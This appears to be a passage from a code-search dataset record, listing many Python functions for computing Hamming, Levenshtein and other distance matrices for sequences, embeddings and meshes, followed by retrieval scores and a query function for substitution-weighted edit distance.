return dist_ap, dist_an, p_inds, n_inds\n\n return dist_ap, dist_an", "def hamming_distance(p, q):\n result = 0\n for x, y in zip(p, q):\n if x != y:\n result += 1\n return result + abs(len(p) - len(q))", "def distance_metric(seg_A, seg_B, dx):\n table_md = []\n table_hd = []\n X, Y, Z = seg_A.shape\n for z in range(Z):\n # Binary mask at this slice\n slice_A = seg_A[:, :, z].astype(np.uint8)\n slice_B = seg_B[:, :, z].astype(np.uint8)\n\n # The distance is defined only when both contours exist on this slice\n if np.sum(slice_A) > 0 and np.sum(slice_B) > 0:\n # Find contours and retrieve all the points\n _, contours, _ = cv2.findContours(cv2.inRange(slice_A, 1, 1),\n cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_NONE)\n pts_A = contours[0]\n for i in range(1, len(contours)):\n pts_A = np.vstack((pts_A, contours[i]))\n\n _, contours, _ = cv2.findContours(cv2.inRange(slice_B, 1, 1),\n cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_NONE)\n pts_B = contours[0]\n for i in range(1, len(contours)):\n pts_B = np.vstack((pts_B, contours[i]))\n\n # Distance matrix between point sets\n M = np.zeros((len(pts_A), len(pts_B)))\n for i in range(len(pts_A)):\n for j in range(len(pts_B)):\n M[i, j] = np.linalg.norm(pts_A[i, 0] - pts_B[j, 0])\n\n # Mean distance and hausdorff distance\n md = 0.5 * (np.mean(np.min(M, axis=0)) + np.mean(np.min(M, axis=1))) * dx\n hd = np.max([np.max(np.min(M, axis=0)), np.max(np.min(M, axis=1))]) * dx\n table_md += [md]\n table_hd += [hd]\n\n # Return the mean distance and Hausdorff distance across 2D slices\n mean_md = np.mean(table_md) if table_md else None\n mean_hd = np.mean(table_hd) if table_hd else None\n return mean_md, mean_hd", "def cal_distances(embeddings):\n # calculate\n dist = np.zeros([len(embeddings), len(embeddings)], dtype=float)\n for ii in xrange(len(embeddings)):\n for jj in xrange(ii + 1, len(embeddings)):\n dist[ii, jj] = np.linalg.norm(embeddings[ii] - embeddings[jj])\n dist[jj, ii] = dist[ii, jj] \n \n # return\n return dist", "def nb_vector_editdistance(indices, seqs_mat, seqs_L, distance_matrix=identity_nb_distance_matrix, gap_penalty=1):\n #print(indices.shape)\n #print(seqs_mat.shape)\n #print(seqs_L.shape)\n return _nb_vector_editdistance(indices, seqs_mat, seqs_L, distance_matrix, gap_penalty)", "def mds(wish_distances, X=None, random_state=None):\n if len(wish_distances.shape) != 2:\n raise ValueError(\"The wish 
distances should be a 2D ndarray.\")\n if wish_distances.shape[0] == wish_distances.shape[1]:\n raise ValueError(\n \"The wish distances should be a squared array (of \"\n \"shape (n by n).\")\n n = wish_distances.shape[0]\n if X is not None and len(X) != n:\n raise ValueError(\n \"The length of \")", "def mds_torch(pre_dist_mat, weights=None, iters=10, tol=1e-5, eigen=False, verbose=0):\n device, dtype = pre_dist_mat.device, pre_dist_mat.type()\n # ensure batched MDS\n pre_dist_mat = expand_dims_to(pre_dist_mat, length = ( 3 - len(pre_dist_mat.shape) ))\n # start\n batch, N, _ = pre_dist_mat.shape\n diag_idxs = np.arange(N)\n his = [torch.tensor([np.inf]*batch, device=device)]\n\n # initialize by eigendecomposition: https://www.lptmc.jussieu.fr/user/lesne/bioinformatics.pdf\n # follow : https://www.biorxiv.org/content/10.1101/2020.11.27.401232v1.full.pdf\n D = pre_dist_mat**2\n M = 0.5 * (D[:, :1, :] + D[:, :, :1] - D) \n # do loop svd bc it's faster: (2-3x in CPU and 1-2x in GPU)\n # https://discuss.pytorch.org/t/batched-svd-lowrank-being-much-slower-than-loop-implementation-both-cpu-and-gpu/119336\n svds = [torch.svd_lowrank(mi) for mi in M]\n u = torch.stack([svd[0] for svd in svds], dim=0)\n s = torch.stack([svd[1] for svd in svds], dim=0)\n v = torch.stack([svd[2] for svd in svds], dim=0)\n best_3d_coords = torch.bmm(u, torch.diag_embed(s).abs().sqrt())[..., :3]\n\n # only eigen - way faster but not weights\n if weights is None and eigen==True:\n return torch.transpose( best_3d_coords, -1, -2), torch.zeros_like(torch.stack(his, dim=0))\n elif eigen==True:\n if verbose:\n print(\"Can't use eigen flag if weights are active. Fallback to iterative\")\n\n # continue the iterative way\n if weights is None:\n weights = torch.ones_like(pre_dist_mat)\n\n # iterative updates:\n for i in range(iters):\n # compute distance matrix of coords and stress\n best_3d_coords = best_3d_coords.contiguous()\n dist_mat = torch.cdist(best_3d_coords, best_3d_coords, p=2).clone()\n\n stress = ( weights * (dist_mat - pre_dist_mat)**2 ).sum(dim=(-1,-2)) * 0.5\n # perturb - update X using the Guttman transform - sklearn-like\n dist_mat[ dist_mat <= 0 ] += 1e-7\n ratio = weights * (pre_dist_mat / dist_mat)\n B = -ratio\n B[:, diag_idxs, diag_idxs] += ratio.sum(dim=-1)\n\n # update\n coords = (1. / N * torch.matmul(B, best_3d_coords))\n dis = torch.norm(coords, dim=(-1, -2))\n\n if verbose >= 2:\n print('it: %d, stress %s' % (i, stress))\n # update metrics if relative improvement above tolerance\n if (his[-1] - stress / dis).mean() <= tol:\n if verbose:\n print('breaking at iteration %d with stress %s' % (i,\n stress / dis))\n break\n\n best_3d_coords = coords\n his.append( stress / dis )\n\n x = torch.transpose(best_3d_coords, -1,-2)#, torch.stack(his, dim=0) ,historic_stresses: (batch x steps)\n x = x.permute(0,2,1)\n return x", "def compute_max_distance(xs, h):\n h1 = np.repeat(xs[:], np.shape(h)[0], axis=0)\n h2 = np.repeat([h], np.shape(xs)[0], axis=0)\n h2 = np.reshape(h2, (np.shape(xs)[0]*np.shape(h)[0], 3))\n return max(np.linalg.norm(h1-h2, axis=1))", "def ComputeDistMatrix(dict_alignedSequences):\r\n \r\n # check if dictionary with keys as tuples containing integers and values as tuples containing strings\r\n check = True \r\n #1 Check Input is dict\r\n if isinstance(dict_alignedSequences, dict) == False:\r\n check = False\r\n \r\n #2 Check are the keys and values tuples. 
Do the keys only contain integers and the vlaues only strings\r\n i = 0\r\n while len(dict_alignedSequences) > i:\r\n #checking for keys and values as tuples\r\n if isinstance(list(dict_alignedSequences.keys())[i], tuple) == False or isinstance(list(dict_alignedSequences.values())[i], tuple) == False:\r\n check = False\r\n break\r\n #checking keys for integers\r\n if isinstance(list(dict_alignedSequences.keys())[i][0], int) == False or isinstance(list(dict_alignedSequences.keys())[i][1], int) == False:\r\n check = False\r\n break\r\n #checking values for strings\r\n if isinstance(list(dict_alignedSequences.values())[i][0], str) == False or isinstance(list(dict_alignedSequences.values())[i][1], str) == False:\r\n check = False\r\n break\r\n \r\n #increment the counter for while loop\r\n i += 1\r\n \r\n #3 Check sequences contain aligned DNA and are of equal length\r\n for key in dict_alignedSequences:\r\n if is_aligned_dna(dict_alignedSequences[key][0]) == False or is_aligned_dna(dict_alignedSequences[key][1]) == False:\r\n check = False\r\n break\r\n if len(dict_alignedSequences[key][0]) != len(dict_alignedSequences[key][1]):\r\n check = False\r\n break\r\n \r\n #final evalauation if data is usable\r\n if check == False:\r\n raise TypeError ('malformed input')\r\n \r\n #get number of sequences\r\n matrixdim = howmany_sequences(dict_alignedSequences)\r\n #initialize dist matrix\r\n distMatrix = init_Dist_Matrix(matrixdim)\r\n \r\n \r\n for i in dict_alignedSequences.keys():\r\n # useing the key i to get the corisponding aligned sequences \r\n seq = dict_alignedSequences[i]\r\n #calculate distances between the sequences\r\n distance = calculate_distance(seq[0],seq[1])\r\n #markdown result at the corrsiponding place in the distmatrix\r\n distMatrix[i[0]][i[1]] = distance\r\n distMatrix[i[1]][i[0]] = distance\r\n \r\n return(distMatrix)", "def hard_example_mining(dist_mat, labels, return_inds=False):\n assert dist_mat.ndimension() == 2\n assert dist_mat.size(0) == dist_mat.size(1)\n N = dist_mat.size(0)\n\n is_pos = labels.expand(N, N).eq(labels.expand(N, N).t())\n is_neg = labels.expand(N, N).ne(labels.expand(N, N).t())\n\n tmp = Variable(dist_mat.data.new().resize_as_(dist_mat.data).fill_(1e4))\n\n dist_ap, p_inds = torch.max(dist_mat - is_neg.float() * tmp, 1, keepdim=False)\n dist_an, n_inds = torch.min(dist_mat + is_pos.float() * tmp, 1, keepdim=False)\n if return_inds:\n return dist_ap, dist_an, p_inds, n_inds\n return dist_ap, dist_an", "def dice_similarity_matrix(references: np.ndarray, queries: np.ndarray) -> np.ndarray:\n size1 = references.shape[0]\n size2 = queries.shape[0]\n scores = np.zeros((size1, size2))\n for i in range(size1):\n for j in range(size2):\n scores[i, j] = dice_similarity(references[i, :], queries[j, :])\n return scores", "def pairwiseScore(seq1, seq2, matrix):\n \n gap = -4.0\n incr_top = 0\n incr_bottom = 0\n pairwise_score = 0\n for i,j in zip(range(len(seq1)), range(len(seq2))):\n aa1 = seq1[i]\n aa2 = seq2[j] \n if aa1==\"-\" and aa2 ==\"-\" :\n pairwise_score += 0\n elif aa1!=\"-\" and aa2!=\"-\":\n pairwise_score += float(matchScore(aa1, aa2, matrix))\n elif aa1==\"-\" and aa2!=\"-\":\n try:\n aa11 = seq1[i+1]\n aa22 = seq2[j+1]\n if aa11==\"-\" and aa22!=\"-\":\n incr_top += 1\n else: \n pairwise_score += gap + incr_top * incr_top\n incr_top = 0\n except: \n pairwise_score += gap\n pass\n elif aa1!=\"-\" and aa2==\"-\":\n try:\n aa11 = seq1[i+1]\n aa22 = seq2[j+1]\n if aa11!=\"-\" and aa22==\"-\":\n incr_bottom += 1\n else: \n pairwise_score += gap + 
incr_bottom * incr_bottom\n incr_bottom = 0\n except: \n pairwise_score += gap\n pass\n else: pass\n \n return pairwise_score", "def seqmat2align(smat,index=None):\n if index is None:\n index = np.arange(smat.shape[0])\n return pd.Series([''.join(smat[seqi,:].astype(str)) for seqi in np.arange(smat.shape[0])], name='seq', index=index)", "def generalised_hamming_distance(a, b):\n if len(a) == len(b):\n return hamming_distance(a, b)\n if len(a) > len(b):\n dna = a\n kmer = b\n else:\n dna = b\n kmer = a\n k = len(kmer)\n\n dist = min([hamming_distance(kmer, kmer2) for kmer2 in kmers_from_dna(dna, k)])\n return dist", "def lcs_hamming_only_matches(s1: str, s2: str, k: int, length: int, matches_lst: List):\n count = 0\n for i in range(0, len(s1) - length + 1):\n for j in range(0, len(s2) - length + 1):\n sub1 = s1[i: i + length]\n sub2 = s2[j: j + length]\n result = hamming_distance(sub1, sub2)\n if result <= k:\n matches_lst.append([i, j, result, sub1, sub2])\n count += 1\n # print(\"total matches: \" + str(count))\n return count", "def measure_distance(self, mat):\n if len(mat) == 1:\n print(\"chain has only one CAatom\")\n return\n self.dists = []\n for num in range(0, len(mat)):\n if num + 1 <= len(mat) - 1:\n c1 = mat[num]\n c2 = mat[num + 1]\n d = c2 - c1\n self.dists.append(math.sqrt(np.sum(d * d)))\n return self.dists", "def full_matrix(ops, mut):\n \n index_mat = np.ones((len(ops),len(ops)))\n pairs = np.argwhere(np.triu(index_mat)==1)\n dist_mat = np.zeros((len(ops),len(ops)))\n distances = []\n labels = []\n\n for pair in pairs:\n mi, label = mut.distance(ops[pair[0]], ops[pair[1]])\n distances.append(mi)\n labels.append(label)\n with ProgressBar():\n distances = dask.compute(*distances)\n\n for i in range(len(labels)):\n mut.memo[labels[i]] = distances[i]", "def hamming(s1, s2):\n s1 = str(s1)\n s2 = str(s2)\n if len(s1) != len(s2):\n raise ValueError(\"Undefined for sequences of unequal length.\")\n return sum(el1 != el2 for el1, el2 in zip(s1, s2))", "def _create_distance_matrix(mesh):\n l = len(mesh.faces)\n\n faces = polygons(mesh.faces, mesh.vertices, mesh.face_normals, mesh.area_faces)\n # map from edge-key to adjacent faces\n adj_faces_map = {}\n # find adjacent faces by iterating edges\n for index, face in enumerate(faces):\n for edge in face.edge_keys:\n if (edge[0] > edge[1]):\n new_edge = (edge[1], edge[0])\n else:\n new_edge = (edge[0], edge[1])\n if new_edge in adj_faces_map:\n adj_faces_map[new_edge].append(index) # 一对多\n else:\n adj_faces_map[new_edge] = [index]\n\n # helping vectors to create sparse matrix later on\n row_indices = []\n col_indices = []\n Gval = [] # values for matrix of angular distances\n Aval = [] # values for matrix of geodesic distances\n # iterate adjacent faces and calculate distances\n for edge, adj_faces in adj_faces_map.items():\n if len(adj_faces) == 2:\n i = adj_faces[0]\n j = adj_faces[1]\n # 一条边连接的两个面\n Gtemp = _geodesic_distance(mesh, faces[i], faces[j], edge) # 测地距离\n Atemp = _angular_distance(mesh, faces[i], faces[j]) # 角距离 # 其实是余弦距离\n Gval.append(Gtemp)\n Aval.append(Atemp)\n row_indices.append(i)\n col_indices.append(j)\n # add symmetric entry\n Gval.append(Gtemp)\n Aval.append(Atemp)\n row_indices.append(j)\n col_indices.append(i)\n\n elif len(adj_faces) > 2:\n print(\"Edge with more than 2 adjacent faces: \" + str(adj_faces) + \"!\")\n\n Gval = numpy.array(Gval)\n Aval = numpy.array(Aval)\n # delta是去全局变量,外部传入的\n values = delta * Gval / numpy.mean(Gval) + \\\n (1.0 - delta) * Aval / numpy.mean(Aval)\n\n # create sparse matrix\n 
distance_matrix = scipy.sparse.csr_matrix(\n (values, (row_indices, col_indices)), shape=(l, l))\n return distance_matrix", "def hard_examples_mining(dist_mat, identity_mat, return_idxes=False):\n # the implementation here is a little tricky, dist_mat contains pairwise distance between probe image and other\n # images in current mini-batch. As we want to select positive examples of the same person, we add a constant\n # negative offset on other images before sorting. As a result, images of the **same** person will rank first.\n sorted_dist_mat, sorted_idxes = torch.sort(dist_mat + (-1e7) * (1 - identity_mat), dim=1,\n descending=True)\n dist_ap = sorted_dist_mat[:, 0]\n hard_positive_idxes = sorted_idxes[:, 0]\n\n # the implementation here is similar to above code, we add a constant positive offset on images of same person\n # before sorting. Besides, we sort in ascending order. As a result, images of **different** persons will rank first.\n sorted_dist_mat, sorted_idxes = torch.sort(dist_mat + 1e7 * identity_mat, dim=1,\n descending=False)\n dist_an = sorted_dist_mat[:, 0]\n hard_negative_idxes = sorted_idxes[:, 0]\n if return_idxes:\n return dist_ap, dist_an, hard_positive_idxes, hard_negative_idxes\n return dist_ap, dist_an", "def compute_pair_site_freqs_serial(alignment_data=None, mx=None,\n seqs_weight=None):\n alignment_shape = alignment_data.shape\n num_seqs = alignment_shape[0]\n seqs_len = alignment_shape[1]\n num_site_pairs = (seqs_len - 1) * seqs_len / 2\n num_site_pairs = np.int64(num_site_pairs)\n m_eff = np.sum(seqs_weight)\n # pair_site_freqs = np.zeros(\n # shape=(num_site_pairs, num_site_states - 1, num_site_states - 1),\n # dtype = np.float64)\n pair_site_freqs = [] # list form so its easier to handle varied num_site_states\n pair_counter = 0\n for i in range(seqs_len - 1):\n column_i = alignment_data[:, i]\n i_site_states = mx[i]\n if len(np.unique(column_i)) != i_site_states:\n print('unique vals doesn\\'match site states')\n sys.exit()\n\n for j in range(i + 1, seqs_len):\n column_j = alignment_data[:, j]\n j_site_states = mx[j]\n if len(np.unique(column_j)) != j_site_states:\n print('unique vals doesn\\'match site states')\n sys.exit()\n pair_site_freqs.append([])\n\n for a in np.unique(column_i):\n pair_site_freqs[-1].append([])\n count_ai = column_i == a\n\n for b in np.unique(column_j):\n count_bj = column_j == b\n count_ai_bj = count_ai * count_bj\n freq_ia_jb = np.sum(count_ai_bj * seqs_weight)\n # pair_site_freqs[pair_counter, a-1, b-1] = freq_ia_jb/m_eff\n pair_site_freqs[-1][-1].append(freq_ia_jb / m_eff)\n # move to the next site pair (i, j)\n pair_counter += 1\n if len(pair_site_freqs) != num_site_pairs:\n print('Not enough site pairs generated')\n sys.exit()\n return pair_site_freqs", "def diagonal_pairings(mat):\n\tw, h = mat.shape\n\tx = mat[:-1,:-1]\n\ty = mat[1:, 1:]\n\tx_cor_list = []\n\ty_cor_list = []\n\tfor i in range(w-1):\n\t\tfor j in range(h-1):\n\t\t\tx_cor_list.append(x[i, j])\n\t\t\ty_cor_list.append(y[i, j])\n\n\treturn x_cor_list, y_cor_list", "def similarity_matrix(points, sigma):\n distances_squared = spherical_distances(points, points)**2\n\n \n return np.exp( -distances_squared / (2.0 * sigma) )", "def get_distance_hamming(self, vec):\r\n\r\n sum = 0\r\n if len(self.weights) == len(vec):\r\n return self.hamming(self.weights, vec)\r\n else:\r\n sys.exit(\"Error: dimension of nodes != input data dimension!\")", "def pair_hmm_align_unaligned_seqs(seqs, moltype=DNA_cogent, params={}):\r\n\r\n seqs = LoadSeqs(data=seqs, moltype=moltype, 
aligned=False)\r\n try:\r\n s1, s2 = seqs.values()\r\n except ValueError:\r\n raise ValueError(\r\n \"Pairwise aligning of seqs requires exactly two seqs.\")\r\n\r\n try:\r\n gap_open = params['gap_open']\r\n except KeyError:\r\n gap_open = 5\r\n try:\r\n gap_extend = params['gap_extend']\r\n except KeyError:\r\n gap_extend = 2\r\n try:\r\n score_matrix = params['score_matrix']\r\n except KeyError:\r\n score_matrix = make_dna_scoring_dict(\r\n match=1, transition=-1, transversion=-1)\r\n\r\n return local_pairwise(s1, s2, score_matrix, gap_open, gap_extend)", "def construct_H_with_KNN_from_distance(dis_mat, k_neig, is_probH=True, m_prob=1, sig=0.002):\n n_obj = dis_mat.shape[0]\n # construct hyperedge from the central feature space of each node\n n_edge = n_obj\n H = np.zeros((n_obj, n_edge))\n for center_idx in range(n_obj):\n dis_mat[center_idx, center_idx] = 0\n dis_vec = dis_mat[center_idx]\n nearest_idx = np.array(np.argsort(dis_vec)).squeeze()\n #avg_dis = np.average(dis_vec)\n if not np.any(nearest_idx[:k_neig] == center_idx):\n nearest_idx[k_neig - 1] = center_idx\n\n for node_idx in nearest_idx[:k_neig]:\n if is_probH:\n H[node_idx, center_idx] = np.exp(- sig * dis_vec[0, node_idx] )\n #print(H[node_idx, center_idx])\n #H[node_idx, center_idx] = dis_vec[0, node_idx]\n else:\n H[node_idx, center_idx] = 1.0\n return H", "def im_dist_mat(self):\n mat = np.zeros([self.I, self.M])\n for i in range(self.I):\n for m in range(self.M):\n mat[i, m] = distance(self.I_coords[i], self.M_coords[m])\n return mat", "def manhattan_dist(idx, pos, n):\n\n row_dist = abs(pos // n - idx // n)\n col_dist = abs(pos % n - idx % n)\n return row_dist + col_dist", "def calc_symmetric_distance(hmm1, hmm2, T, K=1, seed=None):\n seqs1, _ = hmm1.generate_sequences(K, T, seed=seed)\n seqs2, _ = hmm2.generate_sequences(K, T, seed=seed)\n return np.abs(_calc_distance(hmm1, hmm2, seqs2) +\n _calc_distance(hmm2, hmm1, seqs1)) / 2", "def nm_dist_mat(self):\n mat = np.zeros([self.N, self.M])\n for n in range(self.N):\n for m in range(self.M):\n mat[n, m] = distance(self.N_coords[n], self.M_coords[m])\n return mat", "def lcs_hamming_only_matches_with_many_k(s1: str, s2: str, ks: List[int], length: int, matches_lst: List, query_name, target_name):\n file_name = './chromo_matches_' + str(length) + '.txt'\n f = open(file_name, mode='a')\n count = [0, 0, 0]\n for i in range(0, len(s1) - length + 1):\n for j in range(0, len(s2) - length + 1):\n sub1 = s1[i: i + length]\n sub2 = s2[j: j + length]\n result = hamming_distance(sub1, sub2)\n if result <= 0:\n # matches_lst.append([query_name, target_name, i, j, result, sub1, sub2])\n f.write(query_name + ',' + target_name + ',' + str(i) + ',' + str(j) + ',' + str(k)+ ',' + str(sub1) + ',' + sub2 + '\\n')\n count[0] += 1\n if result <= 1:\n f.write(query_name + ',' + target_name + ',' + str(i) + ',' + str(j) + ',' + str(k)+ ',' + str(sub1) + ',' + sub2 + '\\n')\n count[1] += 1\n if result <= 2:\n f.write(query_name + ',' + target_name + ',' + str(i) + ',' + str(j) + ',' + str(k)+ ',' + str(sub1) + ',' + sub2 + '\\n')\n count[2] += 1\n\n # print(\"total matches: \" + str(count))\n f.close()\n return count", "def _pairwise_dist(self,seq1,seq2):\n \n return jf.damerau_levenshtein_distance(str(seq1), str(seq2))", "def get_seeds(seqs):\n k_lengths = list(range(6, 20))\n final_tuples = {}\n motifs_dic = {}\n\n # find most common seeds\n seeds = [find_motifs(seqs, k) for k in k_lengths]\n for i in k_lengths:\n motifs_dic[i] = seeds[i - 6][0:5]\n\n # calculate emissions and transitions\n 
global_possible_occurrences = [sum([len(seq) - k + 1 for seq in seqs]) for k in k_lengths]\n for key in motifs_dic.keys():\n key_tuples = []\n for m in motifs_dic[key]:\n seed = m[0]\n emissions, ind = build_e(seed, ALPHA)\n p = m[1] / global_possible_occurrences[key - 6]\n transitions = build_t(p, ind)\n key_tuples.append((seed, emissions, transitions))\n final_tuples[key] = key_tuples\n\n return final_tuples", "def get_exp_mismatch_matrix(k, _lambda):\n\n words = get_words(k)\n N = len(words)\n\n exp_mismatch_matrix = np.zeros((N, N))\n for i in range(N):\n exp_mismatch_matrix[i,i] = 1\n for j in range(i+1, N):\n exp_mismatch_matrix[i,j] = _lambda**Levenshtein.hamming(words[i], words[j])\n exp_mismatch_matrix[j,i] = exp_mismatch_matrix[i,j]\n\n return exp_mismatch_matrix", "def hamming_distance(h1, h2):\n b1 = bitarray.bitarray()\n b1.frombytes(h1)\n b2 = bitarray.bitarray()\n b2.frombytes(h2)\n return bitarray.bitdiff(b1, b2)", "def distance_between_pattern_and_strings(pattern, dna):\n\n k = len(pattern)\n distance = 0\n\n for text in dna:\n hamming_distance = 1000000\n for i in range(len(text) - k + 1):\n if hamming_distance > compute_hamming_distance(pattern, text[i:i + k]):\n hamming_distance = compute_hamming_distance(pattern, text[i:i + k])\n distance = distance + hamming_distance\n return distance", "def mpd(distmat):\r\n return distmat.sum() / (distmat.size - distmat.shape[0])", "def HammingDistance(pattern1, pattern2):\n distance = 0\n if len(pattern1) == len(pattern2):\n for i in range(len(pattern1)):\n if pattern1[i]!=pattern2[i]:\n distance += 1\n return distance\n else:\n assert 0, \"Two patterns have different lengths.\"", "def compute_hamming_distance(str1, str2):\n\n mismatches = 0\n len_strs = len(str1)\n for i in range(len_strs):\n if str1[i] != str2[i]:\n mismatches = mismatches + 1\n return mismatches", "def distance_matrix(sunspots1, sunspots2):\n \n N1 = len(sunspots1)\n N2 = len(sunspots2)\n\n distance_matrix = np.zeros((N1, N2))\n\n for i in list(range(N1)):\n for j in list(range(N2)):\n\n distance_matrix[i, j] = euclidean_dist(sunspots1[i], sunspots2[j])\n\n return distance_matrix", "def test_matrix_distance(self):\n # note that the score matrix must contain 'diagonal' elements m[i][i]\n # to avoid failure when the sequences match.\n m = {\"U\": {\"U\": 0, \"C\": 1, \"A\": 5}, \"C\": {\"C\": 0, \"A\": 2, \"G\": 4}}\n self.assertEqual(self.RNA(\"UUUCCC\").matrix_distance(\"UCACGG\", m), 14)\n self.assertEqual(self.RNA(\"UUUCCC\").matrix_distance(\"\", m), 0)\n self.assertEqual(self.RNA(\"UUU\").matrix_distance(\"CAC\", m), 7)\n self.assertRaises(KeyError, self.RNA(\"UUU\").matrix_distance, \"CAG\", m)", "def get_alphabet_similarity_matrix(self):\n distance_matrix = numpy.zeros((len(self.alphabet), len(self.alphabet)))\n numpy.fill_diagonal(distance_matrix, 0)\n for index_one, descriptor_one in enumerate(self.descriptors):\n for index_two, descriptor_two in enumerate(self.descriptors):\n distance = descriptor_one - descriptor_two\n squared_distance = numpy.dot(distance, distance)\n distance_matrix[index_one, index_two] = squared_distance\n distance_matrix /= 2. 
* (self.sigma_amino_acid ** 2)\n return numpy.exp(-distance_matrix)", "def distancematrix(vec1, vec2):\n v1, v2 = np.meshgrid(vec1, vec2)\n return np.abs(v1 - v2)", "def dist(dm, sm, neighbors):\n\n # Initialize list of possible distances\n distances = []\n\n # loop over all neighbors of the cell\n for neighbor in neighbors:\n # If the neighbor is valid\n if dm[neighbor[0], neighbor[1]] != -1:\n # add neighbor distance + 1 to possible distances\n distances.append(dm[neighbor[0], neighbor[1]] + 1)\n\n # return minimal distance\n return np.min(distances)", "def test_multilabel_hamming_distance(self, ddp, inputs, ignore_index, multidim_average, average):\n preds, target = inputs\n if ignore_index == -1:\n target = inject_ignore_index(target, ignore_index)\n if multidim_average == \"samplewise\" and preds.ndim < 4:\n pytest.skip(\"samplewise and non-multidim arrays are not valid\")\n if multidim_average == \"samplewise\" and ddp:\n pytest.skip(\"samplewise and ddp give different order than non ddp\")\n\n self.run_class_metric_test(\n ddp=ddp,\n preds=preds,\n target=target,\n metric_class=MultilabelHammingDistance,\n reference_metric=partial(\n _sklearn_hamming_distance_multilabel,\n ignore_index=ignore_index,\n multidim_average=multidim_average,\n average=average,\n ),\n metric_args={\n \"num_labels\": NUM_CLASSES,\n \"threshold\": THRESHOLD,\n \"ignore_index\": ignore_index,\n \"multidim_average\": multidim_average,\n \"average\": average,\n },\n )", "def calc_dist_matrix(self):\n\n self.dist_matrix = spatial.distance.squareform(spatial.distance.pdist(self.data_vector,metric=\"hamming\"))\n\n self.dist_frame = pd.DataFrame(self.dist_matrix,\n index = self.seq_strings,\n columns = self.seq_strings)", "def HammingDistance(array1, array2, normed=False):\n # 0) PREPARE FOR CALCULATIONS\n # 0.1) Convert the arrays into rank-1 arrays\n if len(np.shape(array1)) > 1:\n array1 = array1.reshape(-1)\n if len(np.shape(array2)) > 1:\n array2 = array2.reshape(-1)\n\n # 0.2) Security check\n if len(array1) != len(array2):\n raise ValueError( \"Arrays are not aligned\" )\n\n # 1) COUNT THE NUMBER OF COINCIDENCES\n similarity = (array1 == array2)\n n_equal = similarity.sum()\n\n # 2) COMPUTE THE HAMMING DISTANCE\n length = len(array1)\n h_dist = 1. 
- float(n_equal) / length\n\n # 3) RETURN RESULT ACCORDING TO OPTIONS\n # Standard Hamming distance\n if not normed:\n return h_dist\n\n # Normalized Hamming distance\n else:\n # Count the number of ones in the two arrays\n n_1 = len(array1.nonzero()[0])\n n_2 = len(array2.nonzero()[0])\n\n # Estimate the expected number of random coincidences\n exp_nc = 1.0 / length * (n_1 * n_2 + (length - n_1) * (length - n_2))\n\n # The expected Hamming distance\n exp_hdist = 1.0 - exp_nc / float(length)\n\n return h_dist, exp_hdist", "def distance_matrix(dnas: Collection[str], metric=hamming_distance, relative=True, as_ndarray=False):\n n = len(dnas)\n result = [[0] * n for _ in range(n)]\n for pair in itertools.combinations(zip(range(n), dnas), r=2):\n (idx1, dna1), (idx2, dna2) = pair\n distance = metric(dna1, dna2)\n distance = distance / max(len(dna1), len(dna2)) if relative else distance\n result[idx1][idx2] = distance\n result[idx2][idx1] = distance\n if as_ndarray:\n result = np.asarray(result)\n return result", "def _calc_distance(hmm1, hmm2, seqs2):\n p12 = hmm1.calc_loglikelihood(seqs2)\n p22 = hmm2.calc_loglikelihood(seqs2)\n # calc total number of elements in all sequences\n # TODO: consider the case when number of elements vary from seq to seq\n n_elements = len(seqs2) * len(seqs2[0])\n return (p22 - p12) / n_elements", "def hamming2(s1, s2):\n assert len(s1) == len(s2)\n return sum(c1 != c2 for c1, c2 in zip(s1, s2))" ]
[ "0.63828456", "0.6093228", "0.6056598", "0.59507614", "0.5795671", "0.578761", "0.57800555", "0.574706", "0.5681204", "0.56678975", "0.56452966", "0.56424135", "0.563103", "0.558626", "0.55659384", "0.5539205", "0.5504324", "0.5493676", "0.5407647", "0.5401868", "0.53662705", "0.53654534", "0.5331345", "0.531185", "0.52777064", "0.5271174", "0.52624714", "0.5231668", "0.52188754", "0.52121013", "0.52088666", "0.51912147", "0.5184641", "0.5168403", "0.5156907", "0.51552004", "0.5152715", "0.515053", "0.51418227", "0.51345557", "0.5130021", "0.5129344", "0.5128419", "0.5120421", "0.5118085", "0.5110736", "0.510915", "0.5102084", "0.5101705", "0.5098284", "0.50893307", "0.50761753", "0.50629693", "0.5052477", "0.505048", "0.5042786", "0.50333846", "0.50303316", "0.5023169", "0.49914676", "0.49841696", "0.4982956", "0.49769104", "0.49577573", "0.4948606", "0.49465325", "0.4940728", "0.4937117", "0.49331373", "0.4921258", "0.49147186", "0.4910327", "0.49098286", "0.48963428", "0.4896132", "0.4895852", "0.48935443", "0.48882863", "0.48854056", "0.48761764", "0.48714405", "0.48676166", "0.4866737", "0.4857286", "0.48528442", "0.48522636", "0.4847789", "0.48438883", "0.48358694", "0.48213464", "0.48182982", "0.4807429", "0.47937202", "0.47930557", "0.4792314", "0.47862038", "0.4785764", "0.47854355", "0.47831994", "0.4782779" ]
0.6753979
0
Computes the Levenshtein edit distance between two sequences, with the AA substitution distances provided in distance_matrix. The default distance matrix has a 1 for mismatches and 0 for matches.
def nb_editdistance(seq_vec1, seq_vec2, distance_matrix=identity_nb_distance_matrix, gap_penalty=1):
    q_L = seq_vec1.shape[0]
    s_L = seq_vec2.shape[0]
    if q_L == s_L:
        """No gaps: substitution distance
        This will make it differ from a strict edit-distance since
        the optimal edit-distance may insert same number of gaps in both sequences"""
        dist = 0
        for i in range(q_L):
            dist += distance_matrix[seq_vec1[i], seq_vec2[i]]
        return dist

    ldmat = np.zeros((q_L, s_L), dtype=np.int16)
    for row in range(1, q_L):
        ldmat[row, 0] = row * gap_penalty

    for col in range(1, s_L):
        ldmat[0, col] = col * gap_penalty

    for col in range(1, s_L):
        for row in range(1, q_L):
            ldmat[row, col] = min(ldmat[row-1, col] + gap_penalty,
                                  ldmat[row, col-1] + gap_penalty,
                                  ldmat[row-1, col-1] + distance_matrix[seq_vec1[row-1], seq_vec2[col-1]])  # substitution
    return ldmat[row, col]
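For readers cross-checking the recurrence, here is a hedged plain-Python/NumPy reference (illustrative names, not the dataset's or the library's API) that runs the textbook Levenshtein DP over the full (len1+1) x (len2+1) table, with a pluggable substitution cost that mirrors the default identity matrix (0 for matches, 1 for mismatches):

import numpy as np

# Reference sketch, not the library implementation: classic Levenshtein DP
# with substitution-cost and gap-penalty hooks mirroring the signature above.
def reference_editdistance(s1, s2, sub_cost=lambda a, b: 0 if a == b else 1, gap_penalty=1):
    dp = np.zeros((len(s1) + 1, len(s2) + 1), dtype=np.int16)
    dp[:, 0] = np.arange(len(s1) + 1) * gap_penalty  # delete all of s1's prefix
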